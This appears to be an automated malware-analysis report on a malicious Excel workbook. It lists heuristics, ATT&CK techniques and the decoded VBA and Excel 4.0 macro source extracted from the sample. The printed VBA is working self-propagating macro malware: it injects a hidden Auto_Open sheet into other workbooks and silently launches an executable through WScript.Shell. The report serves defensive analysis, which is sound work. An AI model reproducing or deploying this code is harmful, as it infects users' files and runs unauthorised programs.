MALICIOUS
316
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
This Excel file contains critical Excel 4.0 (XLM) Auto_Open macros and VBA macros that utilize WScript.Shell and CreateObject. The macros attempt to copy data and establish persistence by writing to the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdsv with the executable name 'winupdsv.exe'. It also manipulates 'norma1.xlm' and attempts to create a folder '\Software\' within the user's Templates directory, suggesting a downloader or dropper functionality.
Heuristics 9
-
Excel 4.0 (XLM) Auto_Open + macro sheet critical OLE_XLM_AUTOOPENWorkbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet — the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set w = CreateObject("wscript.shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fso = CreateObject("scripting.filesystemobject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Wb.Names.Add Name:="Auto_Open", RefersToR1C1:="='@kbtasto@she3#'!R1C1:R9C1", Category:="User Defined", MacroType:=xlCommand -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LUREDocument tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 5415 bytes |
SHA-256: bdb201c374fe350532ce16b20bcbc767e2c43431489d3697ac6ea3badb64bb37 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 22 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - @kbtasto@she3
' 0018 29 LABEL : Cell Value, String Constant - Counter len=7 ptgRef3d @kbtasto@she3!B74
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' @kbtasto@she3,A1,"FOPEN("c:\C0MS.sys",3)",""
' @kbtasto@she3,A2,"FOR.CELL("Counter",R~0C~1,TRUE)",""
' @kbtasto@she3,A3,A1,""
' @kbtasto@she3,A4,NEXT(),""
' @kbtasto@she3,A5,FCLOSE(A1),""
' @kbtasto@she3,A6,VBA.INSERT.FILE("c:\C0MS.sys"),""
' @kbtasto@she3,A7,"RUN("addsum",FALSE)",""
' @kbtasto@she3,A8,RETURN(),""
|
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4059 bytes |
SHA-256: 34257e2eabf5a261149759e7def5251224555f608ce77e43d03538af53150227 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim x As New 类1
Private Sub Workbook_Open()
On Error Resume Next
Application.Windows("norma1.xlm").Visible = False
Application.ShowWindowsInTaskbar = False
Set x.App = Application
If Workbooks.Count <= 1 Then
Workbooks.Add
End If
End Sub
Attribute VB_Name = "类1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public WithEvents App As Application
Attribute App.VB_VarHelpID = -1
Private Sub App_NewWorkbook(ByVal Wb As Workbook)
Application.DisplayAlerts = False
If Wb.Name = ThisWorkbook.Name Or Wb.Sheets(1).Name = "@kbtasto@she3#" Then
Exit Sub
End If
ThisWorkbook.Sheets("@kbtasto@she3#").Copy Wb.Sheets(1)
Wb.Sheets(1).Visible = False
Wb.Sheets(1).Name = "@kbtasto@she3#"
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(3).Copy Wb.Sheets("@kbtasto@she3#").Columns(3)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(4).Copy Wb.Sheets("@kbtasto@she3#").Columns(4)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(5).Copy Wb.Sheets("@kbtasto@she3#").Columns(5)
Wb.Names.Add Name:="Auto_Open", RefersToR1C1:="='@kbtasto@she3#'!R1C1:R9C1", Category:="User Defined", MacroType:=xlCommand
Wb.Saved = True
End Sub
Private Sub App_WorkbookBeforeClose(ByVal Wb As Workbook, Cancel As Boolean)
On Error Resume Next
If Wb.Name = ThisWorkbook.Name Then
Exit Sub
End If
Cancel = False
hassaved = Wb.Saved
If hassaved = False Then
ch = MsgBox("Save changes to " & ActiveWorkbook.Name & "?", vbYesNoCancel + vbExclamation)
If ch = vbCancel Then
Cancel = True
Exit Sub
End If
If ch = vbNo Then
If InStr(Wb.Name, ".") <= 0 Then
Wb.Saved = True
Exit Sub
Else
SendKeys "{ESC}"
Wb.ChangeFileAccess xlReadOnly
GoTo quit
End If
End If
If ch = vbYes Then
If InStr(Wb.Name, ".") <= 0 Then
If Not Application.Dialogs(xlDialogSaveAs).Show(Wb.Name & ".xls") Then
Cancel = True
Exit Sub
Else
GoTo a1
End If
End If
Wb.Save
a1:
SendKeys "{ESC}"
Wb.ChangeFileAccess xlReadOnly
End If
Else
If InStr(Wb.Name, ".") <= 0 Then
Exit Sub
End If
SendKeys "{ESC}"
Wb.ChangeFileAccess xlReadOnly
End If
quit:
If Cancel = False And Wb.Sheets(1).Name = "@kbtasto@she3#" Then
sfcea Wb
End If
Wb.Saved = True
End Sub
Private Sub App_WorkbookOpen(ByVal Wb As Workbook)
Application.DisplayAlerts = False
If Wb.Name = "normal.xlm" Then
Wb.Close
Exit Sub
End If
If Wb.Sheets(1).Name = "@kbtasto@she3#" And RTrim(LTrim(Wb.Sheets(1).Cells(79, 2).Value)) <> "a1:" Then
Wb.Sheets("@kbtasto@she3#").Delete
Wb.Save
End If
If Wb.Name = ThisWorkbook.Name Or Wb.Sheets(1).Name = "@kbtasto@she3#" Then
Exit Sub
End If
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "Book1" Then
If Workbooks(i).Saved = True Then
Workbooks(i).Close
GoTo a1
End If
End If
Next
a1:
ThisWorkbook.Sheets("@kbtasto@she3#").Copy Wb.Sheets(1)
Wb.Sheets(1).Visible = False
Wb.Sheets(1).Name = "@kbtasto@she3#"
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(3).Copy Wb.Sheets("@kbtasto@she3#").Columns(3)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(4).Copy Wb.Sheets("@kbtasto@she3#").Columns(4)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(5).Copy Wb.Sheets("@kbtasto@she3#").Columns(5)
Wb.Names.Add Name:="Auto_Open", RefersToR1C1:="='@kbtasto@she3#'!R1C1:R8C1", Category:="User Defined", MacroType:=xlCommand
Wb.Save
End Sub
Private Sub sfcea(ByVal Wb As Workbook)
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
w.Run fso.getspecialfolder(1) & "\sfcea.exe" & " " & Chr(34) & Wb.FullName & Chr(34), 0, True
Set w = Nothing
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.